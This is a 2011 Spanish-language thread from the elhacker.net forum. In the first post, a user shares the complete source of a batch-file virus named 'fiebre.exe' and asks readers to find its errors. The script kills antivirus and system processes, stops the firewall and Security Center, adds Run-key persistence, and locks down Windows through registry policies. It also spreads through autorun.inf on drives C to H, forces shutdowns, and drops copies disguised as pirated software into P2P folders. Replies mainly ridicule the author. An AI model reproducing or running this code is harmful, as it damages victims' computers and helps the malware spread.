elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [BATCH] virus informatico fiebre.exe
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: [BATCH] virus informatico fiebre.exe  (Leído 13,869 veces)
W4rR3d

Desconectado Desconectado

Mensajes: 12


Ver Perfil
[BATCH] virus informatico fiebre.exe
« en: 12 Febrero 2011, 15:46 pm »

sin ven un error en este virus informatico por favor notifinquela.
 hacked by W4rR3d <autodidacta en ingenieria de sistemas y creador de virus informaticos> Piura - Peru

Código
  1. @echo off
  2. :: virus fue creado por hacked by  W4rR3d
  3. :: virus esta dedicado a la comunidad hacker piura- peru
  4. :: virus informatico se llama fiebre.exe
  5. :: virus informatico dedicado al grupo de hackers 'KA0 Team'
  6. :inicio
  7. copy %0 "%homedrive%\"
  8. copy %0 "%windir%\"
  9. copy %0 "%windir%\system32"
  10. copy %0 "%PROGRAMFILES%\"
  11. copy %0 "%allusersprofile%\"
  12. copy %0 "%COMMONPROGRAMFILES%\"
  13. copy %0 "%USERPROFILE%\"
  14. taskkill /f/im aswRegSvr.exe /im aswRegSvr64.exe /im AvastSvc.exe
  15. taskkill /f/im explorer.exe /im teatimer.exe /im taskmgr.exe
  16. taskkill /f/im explorer.exe /im firefox.exe /im  photoshop.exe
  17. net stop "Security Center"
  18. net stop SharedAccess
  19. net stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
  20. REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v system /t REG_SZ /d "%windir%\system32\fiebre.exe" /F
  21. reg add hklm\software\microsoft\windows\currentversion\run /v fiebre /t reg_sz /d %eb1%fiebre.exe /f
  22. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  23. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
  24. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  25. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
  26. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
  27. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  28. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
  29. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  30. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  31. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 1 /f
  32. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  33. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.elcachondeo.cl/foro/showthread.php?t=364382"
  34. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  35. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  36. Set eb1= C:\
  37. Set eb2= D:\
  38. Set eb3= E:\
  39. Set eb4= F:\
  40. Set eb5= G:\
  41. Set eb6= H:\
  42. if exist %eb1%autorun.inf (goto fie1) else (goto fie2)
  43. :fie2
  44. copy /Y %0 %eb1%fiebre.exe
  45. echo.[AutoRun]>> %eb1%autorun.inf
  46. echo.open="%eb1%fiebre.exe">> %eb1%autorun.inf
  47. echo.action=Open folder to see files...>> %eb1%autorun.inf
  48. attrib +r +s +h %eb1%autorun.inf
  49. attrib +r +s +h %eb1%fiebre.exe
  50. echo On Error Resume Next >> %eb1%apagar.vbs
  51. echo set shell = CreateObject("WScript.Shell") >> %eb1%apagar.vbs
  52. echo shell.run "shutdown.exe -s  -t 13" >> %eb1%apagar.vbs
  53. attrib +r +s +h %eb1%apagar.vbs
  54. start %eb1%apagar.vbs
  55. :fie1
  56. if exist %eb2%autorun.inf (goto fie3) else (goto fie4)
  57. :fie4
  58. copy /Y %0 %eb2%fiebre.exe
  59. echo.[AutoRun]>> %eb2%autorun.inf
  60. echo.open="%eb2%fiebre.exe">> %eb2%autorun.inf
  61. echo.action=Open folder to see files...>> %eb2%autorun.inf
  62. attrib +r +s +h %eb2%autorun.inf
  63. attrib +r +s +h %eb2%fiebre.exe
  64. echo On Error Resume Next >> %eb2%apagar.vbs
  65. echo set shell = CreateObject("WScript.Shell") >> %eb2%apagar.vbs
  66. echo shell.run "shutdown.exe -s  -t 13" >> %eb2%apagar.vbs
  67. attrib +r +s +h %eb2%apagar.vbs
  68. start %eb2%apagar.vbs
  69. :fie3
  70. if exist %eb3%autorun.inf (goto fie5) else (goto fie6)
  71. :fie6
  72. copy /Y %0 %eb3%fiebre.exe
  73. echo.[AutoRun]>> %eb3%autorun.inf
  74. echo.open="%eb3%fiebre.exe">> %eb3%autorun.inf
  75. echo.action=Open folder to see files...>> %eb3%autorun.inf
  76. attrib +r +s +h %eb3%autorun.inf
  77. attrib +r +s +h %eb3%fiebre.exe
  78. echo On Error Resume Next >> %eb3%apagar.vbs
  79. echo set shell = CreateObject("WScript.Shell") >> %eb3%apagar.vbs
  80. echo shell.run "shutdown.exe -s  -t 13" >> %eb3%apagar.vbs
  81. attrib +r +s +h %eb3%apagar.vbs
  82. start %eb3%apagar.vbs
  83. :fie5
  84. if exist %eb4%autorun.inf (goto fie7) else (goto fie8)
  85. :fie8
  86. copy /Y %0 %eb4%fiebre.exe
  87. echo.[AutoRun]>> %eb4%autorun.inf
  88. echo.open="%eb4%fiebre.exe">> %eb4%autorun.inf
  89. echo.action=Open folder to see files...>> %eb4%autorun.inf
  90. attrib +r +s +h %eb4%autorun.inf
  91. attrib +r +s +h %eb4%fiebre.exe
  92. echo On Error Resume Next >> %eb4%apagar.vbs
  93. echo set shell = CreateObject("WScript.Shell") >> %eb4%apagar.vbs
  94. echo shell.run "shutdown.exe -s  -t 13" >> %eb4%apagar.vbs
  95. attrib +r +s +h %eb4%apagar.vbs
  96. start %eb4%apagar.vbs
  97. :fie7
  98. if exist %eb5%autorun.inf (goto fie9) else (goto fie10)
  99. :fie10
  100. copy /Y %0 %eb5%fiebre.exe
  101. echo.[AutoRun]>> %eb5%autorun.inf
  102. echo.open="%eb5%fiebre.exe">> %eb5%autorun.inf
  103. echo.action=Open folder to see files...>> %eb5%autorun.inf
  104. attrib +r +s +h %eb5%autorun.inf
  105. attrib +r +s +h %eb5%fiebre.exe
  106. echo On Error Resume Next >> %eb5%apagar.vbs
  107. echo set shell = CreateObject("WScript.Shell") >> %eb5%apagar.vbs
  108. echo shell.run "shutdown.exe -s  -t 13" >> %eb5%apagar.vbs
  109. attrib +r +s +h %eb5%apagar.vbs
  110. start %eb5%apagar.vbs
  111. :fie9
  112. if exist %eb6%\autorun.inf (goto fie11) else (goto fie12)
  113. :fie12
  114. copy /Y %0 %eb6%fiebre.exe
  115. echo.[AutoRun]>> %eb6%autorun.inf
  116. echo.open="%eb6%fiebre.exe">> %eb6%autorun.inf
  117. echo.action=Open folder to see files...>> %eb6%autorun.inf
  118. attrib +r +s +h %eb6%autorun.inf
  119. attrib +r +s +h %eb6%fiebre.exe
  120. echo On Error Resume Next >> %eb6%\apagar.vbs
  121. echo set shell = CreateObject("WScript.Shell") >> %eb6%apagar.vbs
  122. echo shell.run "shutdown.exe -s  -t 13" >> %eb6%apagar.vbs
  123. attrib +r +s +h %eb6%apagar.vbs
  124. start %eb6%apagar.vbs
  125. :fie11
  126. set /a war1="%programfiles%\eMule\Incoming"
  127. set /a war2="%programfiles%\KaZaA\My Shared Folder"
  128. set /a war3="%appdata%\Ares\My Shared Folder"
  129. Set /a War4="%programfiles%\Alwil Software\Avast5"
  130. if exist %war1% (
  131. for /d %%a ("Internet Explorer 7.exe","Windows Xp.exe","Nero Start Smart 9.exe","Microsoft Office 2007.exe","Avast 5.1 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war1%\%%a copy /y "%~0" %war1%\%%a)
  132. )
  133. if exist %war2% (
  134. for /d %%a ("Windows Xp.exe","Nero Start Smart 9.exe","Microsoft Office 2007.exe","Avast 5.1 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war2%\%%a copy /y "%~0" %war2%\%%a)
  135. )
  136. if exist %war3% (
  137. for /d %%a ("Windows Live Messenger 9.5.exe","avast! Free Antivirus 5.exe", "aswRegSvr 64.exe","AvastSvc 50.exe","aswRunDll 3.2.exe","Avast 5.3 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war3%\%%a copy /y "%~0" %war3%\%%a)
  138. )
  139. if exist %war4% (
  140. for /d %%a ("aswRegSvr 5.exe","avast! Free Antivirus 5.exe", "Windows Xp.exe","aswRegSvr 9.exe","aswRunDll 5.exe","Avast 5.3 Pro Full.exe","Windows Live Messenger 8.5.exe" do (if not exist %war4%\%%a copy /y "%~0" %war4%\%%a)
  141. echo Msgbox "ha sido hackeado por hacked by W4rR3d" >> %homedrive%\mensaje.vbs
  142. For /L %%a IN (0,1,1000) DO start %homedrive%\mensaje.vbs
  143. goto inicio
  144.  


« Última modificación: 14 Febrero 2011, 16:39 pm por W4rR3d » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: virus informatico fiebre.exe
« Respuesta #1 en: 12 Febrero 2011, 19:41 pm »

Deberías de dejar YA batch y meterte con un VERDADERO lenguaje de programación.


En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
SuperDraco


Desconectado Desconectado

Mensajes: 2.505


Crew Dragon


Ver Perfil
Re: virus informatico fiebre.exe
« Respuesta #2 en: 12 Febrero 2011, 21:09 pm »

Deberías de dejar YA batch y meterte con un VERDADERO lenguaje de programación.

Oye! Que por algo se empieza :P!

Yo aún sigo soñando que NovLucker me enseñe VBS :'S snif snif... daría un riñon! XD        FAN NUMBER ONE!!!

En línea

No he vuelto, solo estoy de paso.
pucheto

Desconectado Desconectado

Mensajes: 215


Ver Perfil
Re: virus informatico fiebre.exe
« Respuesta #3 en: 12 Febrero 2011, 22:06 pm »

Citar
hacked by W4rR3d <autodidacta en ingenieria de sistemas y creador de virus informaticos> Piura - Peru
A, felicidades...
En línea

seba123neo


Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: virus informatico fiebre.exe
« Respuesta #4 en: 12 Febrero 2011, 22:23 pm »

hombre, haber si gastamos el tiempo en algo mas productivo...

PD: si esto es ser hacker, yo soy casi Dios.
« Última modificación: 12 Febrero 2011, 22:24 pm por seba123neo » En línea

Di~OsK


Desconectado Desconectado

Mensajes: 903



Ver Perfil WWW
Re: virus informatico fiebre.exe
« Respuesta #5 en: 12 Febrero 2011, 23:09 pm »

A, felicidades...

x2
En línea

Necesitas un servidor de TeamSpeak? Un certificado SSL? MANDA MP
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: virus informatico fiebre.exe
« Respuesta #6 en: 12 Febrero 2011, 23:17 pm »

A ver, @W4rR3d, si vuelves a publicar algo sin etiquetas de código, te voy a borrar el mensaje así sin más. LEE LAS REGLAS. Y dedícate a algo más productivo que a crear estupideces en Batch.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
W4rR3d

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: virus informatico fiebre.exe
« Respuesta #7 en: 14 Febrero 2011, 16:49 pm »

A ver, @W4rR3d, si vuelves a publicar algo sin etiquetas de código, te voy a borrar el mensaje así sin más. LEE LAS REGLAS. Y dedícate a algo más productivo que a crear estupideces en Batch.
mira amigo si quieres aprender de mi estos son codigos cuando me inicie en programacion en batch, tambien domino vb 6.0, java script, c++ , c, fox pro 6.0,visual script y otros mas ya amiguito leo gutièrrez. que dios te bendiga leo gutièrrez
En línea

pucheto

Desconectado Desconectado

Mensajes: 215


Ver Perfil
Re: [BATCH] virus informatico fiebre.exe
« Respuesta #8 en: 14 Febrero 2011, 17:08 pm »

mira amigo si quieres aprender de mi estos son codigos cuando me inicie en programacion en batch...
Bien tigre, q haces aca y no en la caja de zucaritas...

tambien domino vb 6.0, java script, c++ , c, fox pro 6.0,visual script y otros mas
Dibuje maestro ya que tanto sabe y tanto domina...
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: [BATCH] virus informatico fiebre.exe
« Respuesta #9 en: 15 Febrero 2011, 06:04 am »

Bien tigre, q haces aca y no en la caja de zucaritas...
Dibuje maestro ya que tanto sabe y tanto domina...

jajajajaa que groso este comentario xDDD

+1
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
virus informatico dengue.bat
Scripting
W4rR3d 4 4,827 Último mensaje 8 Febrero 2011, 22:32 pm
por leogtz
[BATCH] virus informatico viruela.exe
Scripting
W4rR3d 1 2,839 Último mensaje 10 Febrero 2011, 17:43 pm
por SuperDraco
virus informatico msn.exe « 1 2 »
Scripting
W4rR3d 10 7,278 Último mensaje 21 Febrero 2011, 01:40 am
por ace332
virus informatico taskmgr.bat
Scripting
W4rR3d 4 4,622 Último mensaje 26 Marzo 2011, 13:13 pm
por FranciskoAsdf
virus informatico llamado e.coli.bat
Scripting
W4rR3d 9 5,352 Último mensaje 17 Junio 2011, 20:28 pm
por SuperDraco
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines